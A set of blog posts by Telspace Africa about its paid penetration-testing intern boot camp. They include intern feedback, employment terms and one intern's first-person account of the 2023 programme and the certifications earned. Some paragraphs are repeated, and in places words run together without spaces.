Our interns don’t have any monetary restraint attached to them, as they are paid a monthly salary whilst undertaking the training with us. Additionally, there are no restraints where the interns will have to pay back money if they do not end up working for Telspace at the end of the Boot Camp. Having an approach other than this would not benefit our newcomers to the industry, nor the community at large.
If interns are uncertain that they are a good fit for the industry or at Telspace Africa during the boot camp, then they are free to leave at any time, taking what they have learnt with them, including any certifications (and we are more than happy with that!).
Should our interns pass the strict criteria at the end of the boot camp, via different assessment gateways, then they will be offered a 4-month contract as a junior analyst with Telspace Africa (which they are not obliged to accept). If they do accept the offer, then further certifications and training will be provided by Telspace.
This boot camp is about growing the information security community, and thereafter, our company; in order to provide our customers with the best possible service.

Telspace wishes each new intern the very best of luck; we are eager to see the wonderful knowledge you will gain, as well as the many shells you will be popping!

↧

Boot Camp: 2023

August 2, 2023, 2:27 am

≫ Next: Article 0

≪ Previous: Boot Camp: 2022

We kicked off our 2023 Boot Camp programme with a fresh intake of interns in July 2023. After approximately 50 grueling interviews, 6 candidates were selected and invited to attend the Boot Camp. Congratulations to all that made it!

They are already knee-deep in the Boot Camp, having already completed several modules of the boot camp within their first month!

We asked them for some feedback on their experience so far:

"The Telspace internship offers a dynamic and healthy work environment . It involves research, problem-solving, and exposure to top security experts, providing an incredible learning experience and motivation to be part of the team" - Sifundo

"My experience in the bootcamp thus far has been challenging but very insightful. I've learned a lot in a very short time thanks to a welcoming, understanding and highly knowledgeable team." - Nathan

"I am in the hacker's realm. What more can I ask for? The learning experience has been great. The organisational culture is fantastic, and I plan to make the most of this golden opportunity." - Jacky

"The bootcamp has been challenging, but I am learning a lot about penetration testing." - Muhammad

"Through steep learning curves, we thrived; together yet independent. Laughter fortified us, and as one, we safeguard both each other and a better tomorrow" - Shane

For those interested in entering the industry, we regularly host boot camps. If you would like to participate in our next boot camp, please get in touch with us at recruitment@telspace.africa

Our interns don’t have any monetary restraint attached to them, as they are paid a monthly salary whilst undertaking the training with us. Additionally, there are no restraints where the interns will have to pay back money if they do not end up working for Telspace at the end of the Boot Camp. Having an approach other than this would not benefit our newcomers to the industry, nor the community at large.
If interns are uncertain that they are a good fit for the industry or at Telspace Africa during the boot camp, then they are free to leave at any time, taking what they have learnt with them, including any certifications (and we are more than happy with that!).
Should our interns pass the strict criteria at the end of the boot camp, via different assessment gateways, then they will be offered a 4-month contract as a junior analyst with Telspace Africa (which they are not obliged to accept). If they do accept the offer, then further certifications and training will be provided by Telspace.
This boot camp is about growing the information security community, and thereafter, our company; in order to provide our customers with the best possible service.

Telspace wishes each new intern the very best of luck; we are eager to see the wonderful knowledge you will gain, as well as the many shells you will be popping!

↧

Article 0

October 27, 2023, 1:30 am

≪ Previous: Boot Camp: 2023

TransformativeJourney:MyExperienceattheTelspaceBootcamp

My journey through the world of cybersecurity has been a series of remarkable milestones, all of which led me to the life changing Telspace Bootcamp experience. It all began with a triumphant win at the ITWeb Security Summit Hackathon.ThisvictorynotonlymarkedmyentryintotheTelspaceBootcampbutalsosetthestageformyjourney of growth and achievement. In this blog post, I will delve into my enriching experience at the Telspace Bootcamp, from its commencement on July 3rd, 2023, to its conclusion on August 31st, 2023, and the certifications that crownedmyjourney.

FromHackathontoBootcamp:ADreamComeTrue

Back in June 2023, I had the opportunity of a lifetime – participating in the ITWeb Security Summit Hackathon whichTelspacesponsorseveryyear.TheeventtookplaceattheprestigiousSandtonConventionCentre,where cybersecurityenthusiastsandexpertsgatheredtoshowcasetheirskills.Iwasdeterminedtoprovemyselfinthe RedTeamingCapturetheFlag(CTF)competitionthatwasbuiltby theTelspaceTeam.Iwassothrilledtohaveemerged as the winner of the ITWeb Security Summit Hackathon 2023.It was an incredible journey, and I was grateful for the opportunity to showcase my skills in identifying vulnerabilities and proposing innovative solutions.

UponwinningthehackathonIreceivedaninvitationtotheTelspaceBootcamp -thiswasadreamcometrue.This bootcampwasrenownedforitsrigorousandcomprehensivetrainingprogram.Itpromisedtonotonlyequipme with the necessary skills but also immerse me in the practicalities of the cybersecurity world.

ADynamicLearningEnvironment

From day one, the Telspace Bootcamp proved to be a dynamic and immersive learning environment. The curriculumcoveredanextensiverangeofcybersecuritytopics,fromthefundamentalstoadvancedtechniques.The instructors were not just educators; they were experienced professionals who shared their real-world insights and experiences. This made the learning experience both enriching and practical.

TheBootcampprogrammeincluded,butwasnotlimitedto:

Hardware hacking
Hands on Hacking Fundamentals
Enterprise Infrastructure Hacking
Web Application Hacking
Mobile Application Pen testing
Hacking APIs
Academy All-Access Membership from TCM Security

Hands-on PracticalExercises

OneofthehallmarksoftheTelspaceBootcampwasitsemphasisonhands-onpracticalexercises.Wewerenotjust learning theoretical concepts; we were applying them in simulated environments. These exercises ranged from ethicalhackingandpenetrationtestingchallenges,tonetworksecurity simulations.Theyweredesignedtoprepare us for the real challenges faced by cybersecurity professionals.

At Telspace, one of the most valuable lessons I learned was the stark contrast to many other courses/internships/bootcamps that often inundate students with tools and concepts that rarely find practical application in the real-world scenarios; instead, Telspace was a refreshing departure from the norm, steadfastly focusing on those tools and topics proven to be indispensable for success as an ethical hacker, a deliberate approach that reflected the bootcamps' commitment to providing an education deeply rooted in practicality and real-world relevance, with an incredibly immersive, hands-on structure that not only demystified but also meticulously covered a multitude of foundational topics, effectively equipping me with the knowledge and skills that I knew would truly empower me in the field.

MentorshipandGuidance

Throughout the duration of the bootcamp, the invaluable mentorship we received played an instrumental role in shapingourdevelopmentandenhancingourlearningexperience,asourdedicatedmentorsconsistentlyorganised and conducted live sessions, thereby affording us the exceptional opportunity to acquire knowledge and seek clarificationthroughtheaskingofquestions,withnotableexamplesincludinglivedemonstrationsillustratingthe intricate processes of hacking a mobile application and the jailbreaking of an iPhone; this highly personalised approach employed by our mentors proved to be a pivotal factor in my educational journey, enabling me to surmountobstaclesandgainaprofoundunderstandingofcomplexconcepts.

EarningthePJPTCertificationwith"EarlyAdopter"Badge

OneofthemostsignificantmilestonesduringmytenureattheTelspaceBootcampwasachievingthePJPT (PracticalJuniorPenetrationTester)certification.Thisachievement,earnedonJuly27th,2023,notonlyvalidated my learningsin penetration testing and ethical hackingbut also camewith theprestigious "early adopter"badge. Thisbadgesymbolisedmydedicationandcommitmenttostayingattheforefrontofcybersecurityknowledge.AsI am part of the first 100 to obtain this certificate.

FromtheTCMSecuritywebsite:

"Thisexamassessesastudent’sabilitytoperformaninternalnetworkpenetrationtestatanassociatelevel. Students will have two (2) full days to complete the assessment and an additional two (2) days to write a professional report.

Inordertoreceivethecertification,astudentmust:

LeveragetheirActiveDirectoryexploitationskillsetstoperformlateralandverticalnetworkmovements,and ultimatelycompromisetheexamDomainController.Also,provideadetailed,professionallywrittenreport."

ConqueringthePNPTCertification

Asmyjourneycontinued,IreachedanotherpinnacleonAugust26th,2023,byattainingthePNPT(Practical NetworkPenetrationTester)certification.Thiscertification furthersolidifiedmylearningsinnetworksecurityandbolstered my credentials on my journey to becoming a cybersecurity professional.

PNPT Advice

Due to NDA, I am unable to discuss specifics regarding the test, however I can offer the following guidance to anyone preparing to take the PNPT exam:

Finish these 5 recommended courses:

Practical Ethical Hacking (PEH) course
Windows Privilege Escalation (WPE) course
Open-Source Intelligence (OSINT) course
External Pentest Playbook (EPP) course
Linux Privilege Escalation (LPE) course

Conclusion: A Journey of Transformation

MyexperienceattheTelspaceBootcampwasnotjustatrainingprogram;itwasajourneyoftransformation.It honed my skills, expanded my knowledge, and prepared me for the challenges of the cybersecurity field. I am immenselygratefulforthementorship,hands-onexperience,andthecertificationsthathavepropelledme forward.Thisjourneyisjustthebeginning,andIlookforwardtotheexcitingopportunitiesandchallengesthatlie ahead in the ever-evolving world of cybersecurity.

- Blog Post by Sifundo Ngubane

↧